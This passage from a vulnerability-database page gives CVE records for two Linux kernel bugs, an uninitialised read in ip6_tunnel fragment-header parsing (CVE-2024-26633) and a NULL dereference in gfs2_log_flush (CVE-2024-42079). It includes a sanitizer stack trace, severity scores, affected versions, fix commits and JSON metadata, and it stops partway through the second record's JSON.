In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim() syzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken. Reading frag_off can only be done if we pulled enough bytes to skb->head. Currently we might access garbage. [1] BUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0 ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0 ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline] ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592 neigh_output include/net/neighbour.h:542 [inline] ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137 ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222 NF_HOOK_COND include/linux/netfilter.h:303 [inline] ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243 dst_output include/net/dst.h:451 [inline] ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155 ip6_send_skb net/ipv6/ip6_output.c:1952 [inline] ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972 rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582 rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920 inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x490 net/socket.c:2674 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] __kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517 __do_kmalloc_node mm/slab_common.c:1006 [inline] __kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027 kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582 pskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098 __pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655 pskb_may_pull_reason include/linux/skbuff.h:2673 [inline] pskb_may_pull include/linux/skbuff.h:2681 [inline] ip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408 ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline] ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592 neigh_output include/net/neighbour.h:542 [inline] ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137 ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222 NF_HOOK_COND include/linux/netfilter.h:303 [inline] ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243 dst_output include/net/dst.h:451 [inline] ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155 ip6_send_skb net/ipv6/ip6_output.c:1952 [inline] ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972 rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582 rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920 inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendms ---truncated---

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/135414f300c5db995…
	https://git.kernel.org/stable/c/3f15ba3dc14e6ee00…
	https://git.kernel.org/stable/c/da23bd709b46168f7…
	https://git.kernel.org/stable/c/4329426cf6b8e22b7…
	https://git.kernel.org/stable/c/62a1fedeb14c7ac09…
	https://git.kernel.org/stable/c/687c5d52fe53e602e…
	https://git.kernel.org/stable/c/ba8d904c274268b18…
	https://git.kernel.org/stable/c/d375b98e024898068…

Impacted products

Vendor

Product

Version

Linux

Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < 135414f300c5db995e2a2f3bf0f455de9d014aee (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < 3f15ba3dc14e6ee002ea01b4faddc3d49200377c (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < da23bd709b46168f7dfc36055801011222b076cd (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < 4329426cf6b8e22b798db2331c7ef1dd2a9c748d (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < 62a1fedeb14c7ac0947ef33fadbabd35ed2400a2 (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < 687c5d52fe53e602e76826dbd4d7af412747e183 (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < ba8d904c274268b18ef3dc11d3ca7b24a96cb087 (git)
Affected: fbfa743a9d2a0ffa24251764f10afc13eb21e739 , < d375b98e0248980681e5e56b712026174d617198 (git)
Affected: a6f6bb6bc04a5f88a31f47a6123d3fbf5ee8d694 (git)
Affected: 72bbf335e7aad09c88c50dbdd238f4faabd12174 (git)
Affected: decccc92ee0a978a1c268b5df16824cb6384ed3c (git)
Affected: d3d9b59ab32160e3cc4edcf7e5fa7cecb53a7d25 (git)
Affected: d397f7035d2c754781bbe93b07b94d8cd898620c (git)
Affected: 41e07a7e01d951cfd4c9a7dac90c921269d89513 (git)
Affected: a7fe4e5d06338e1a82b1977eca37400951f99730 (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 4.19.306 , ≤ 4.19.* (semver)
Unaffected: 5.4.268 , ≤ 5.4.* (semver)
Unaffected: 5.10.209 , ≤ 5.10.* (semver)
Unaffected: 5.15.148 , ≤ 5.15.* (semver)
Unaffected: 6.1.75 , ≤ 6.1.* (semver)
Unaffected: 6.6.14 , ≤ 6.6.* (semver)
Unaffected: 6.7.2 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26633",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-18T19:01:45.822242Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-05T17:13:27.539Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-12-20T13:06:42.426Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20241220-0001/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_tunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "135414f300c5db995e2a2f3bf0f455de9d014aee",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "3f15ba3dc14e6ee002ea01b4faddc3d49200377c",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "da23bd709b46168f7dfc36055801011222b076cd",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "4329426cf6b8e22b798db2331c7ef1dd2a9c748d",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "62a1fedeb14c7ac0947ef33fadbabd35ed2400a2",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "687c5d52fe53e602e76826dbd4d7af412747e183",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "ba8d904c274268b18ef3dc11d3ca7b24a96cb087",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "lessThan": "d375b98e0248980681e5e56b712026174d617198",
              "status": "affected",
              "version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a6f6bb6bc04a5f88a31f47a6123d3fbf5ee8d694",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "72bbf335e7aad09c88c50dbdd238f4faabd12174",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "decccc92ee0a978a1c268b5df16824cb6384ed3c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d3d9b59ab32160e3cc4edcf7e5fa7cecb53a7d25",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d397f7035d2c754781bbe93b07b94d8cd898620c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "41e07a7e01d951cfd4c9a7dac90c921269d89513",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a7fe4e5d06338e1a82b1977eca37400951f99730",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_tunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.306",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.268",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.209",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.148",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.75",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.14",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.306",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.268",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.209",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.148",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.75",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.14",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.2",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.2.87",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.10.106",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.12.71",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.16.42",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.18.49",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.4.50",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()\n\nsyzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken.\n\nReading frag_off can only be done if we pulled enough bytes\nto skb-\u003ehead. Currently we might access garbage.\n\n[1]\nBUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendmsg net/socket.c:2676 [inline]\n__se_sys_sendmsg net/socket.c:2674 [inline]\n__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674\ndo_syscall_x64 arch/x86/entry/common.c:52 [inline]\ndo_syscall_64+0x44/0x110 arch/x86/entry/common.c:83\nentry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\nslab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\nslab_alloc_node mm/slub.c:3478 [inline]\n__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517\n__do_kmalloc_node mm/slab_common.c:1006 [inline]\n__kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027\nkmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582\npskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098\n__pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655\npskb_may_pull_reason include/linux/skbuff.h:2673 [inline]\npskb_may_pull include/linux/skbuff.h:2681 [inline]\nip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendms\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:54:18.313Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c"
        },
        {
          "url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd"
        },
        {
          "url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d"
        },
        {
          "url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2"
        },
        {
          "url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183"
        },
        {
          "url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087"
        },
        {
          "url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198"
        }
      ],
      "title": "ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26633",
    "datePublished": "2024-03-18T10:07:49.468Z",
    "dateReserved": "2024-02-19T14:20:24.136Z",
    "dateUpdated": "2025-05-04T12:54:18.313Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42079 (GCVE-0-2024-42079)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2026-02-12 08:19

Title

gfs2: Fix NULL pointer dereference in gfs2_log_flush

Summary

In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix NULL pointer dereference in gfs2_log_flush In gfs2_jindex_free(), set sdp->sd_jdesc to NULL under the log flush lock to provide exclusion against gfs2_log_flush(). In gfs2_log_flush(), check if sdp->sd_jdesc is non-NULL before dereferencing it. Otherwise, we could run into a NULL pointer dereference when outstanding glock work races with an unmount (glock_work_func -> run_queue -> do_xmote -> inode_go_sync -> gfs2_log_flush).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c3c5cfa3170c0940b…
	https://git.kernel.org/stable/c/5f6a84cfb33b34610…
	https://git.kernel.org/stable/c/3429ef5f50909cee9…
	https://git.kernel.org/stable/c/f54f9d5368a4e92ed…
	https://git.kernel.org/stable/c/35264909e9d1973ab…

Impacted products

Vendor

Product

Version

Linux

Affected: 82218943058d5e3fe692a38b5a549479738dab33 , < c3c5cfa3170c0940bc66a142859caac07d19b9d6 (git)
Affected: 82218943058d5e3fe692a38b5a549479738dab33 , < 5f6a84cfb33b34610623857bd93919dcb661e29b (git)
Affected: 82218943058d5e3fe692a38b5a549479738dab33 , < 3429ef5f50909cee9e498c50f0c499b9397116ce (git)
Affected: 82218943058d5e3fe692a38b5a549479738dab33 , < f54f9d5368a4e92ede7dd078a62788dae3a7c6ef (git)
Affected: 82218943058d5e3fe692a38b5a549479738dab33 , < 35264909e9d1973ab9aaa2a1b07cda70f12bb828 (git)

Linux

Affected: 5.12
Unaffected: 0 , < 5.12 (semver)
Unaffected: 5.15.200 , ≤ 5.15.* (semver)
Unaffected: 6.1.162 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:31.753Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3429ef5f50909cee9e498c50f0c499b9397116ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f54f9d5368a4e92ede7dd078a62788dae3a7c6ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35264909e9d1973ab9aaa2a1b07cda70f12bb828"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42079",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:17.192306Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:07.945Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/log.c",
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c3c5cfa3170c0940bc66a142859caac07d19b9d6",
              "status": "affected",
              "version": "82218943058d5e3fe692a38b5a549479738dab33",
              "versionType": "git"
            },
            {
              "lessThan": "5f6a84cfb33b34610623857bd93919dcb661e29b",
              "status": "affected",
              "version": "82218943058d5e3fe692a38b5a549479738dab33",
              "versionType": "git"
            },
            {
              "lessThan": "3429ef5f50909cee9e498c50f0c499b9397116ce",
              "status": "affected",
              "version": "82218943058d5e3fe692a38b5a549479738dab33",
              "versionType": "git"
            },
            {
              "lessThan": "f54f9d5368a4e92ede7dd078a62788dae3a7c6ef",
              "status": "affected",
              "version": "82218943058d5e3fe692a38b5a549479738dab33",
              "versionType": "git"
            },
            {
              "lessThan": "35264909e9d1973ab9aaa2a1b07cda70f12bb828",
              "status": "affected",
              "version": "82218943058d5e3fe692a38b5a549479738dab33",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/log.c",
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.12"
            },
            {
              "lessThan": "5.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.200",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
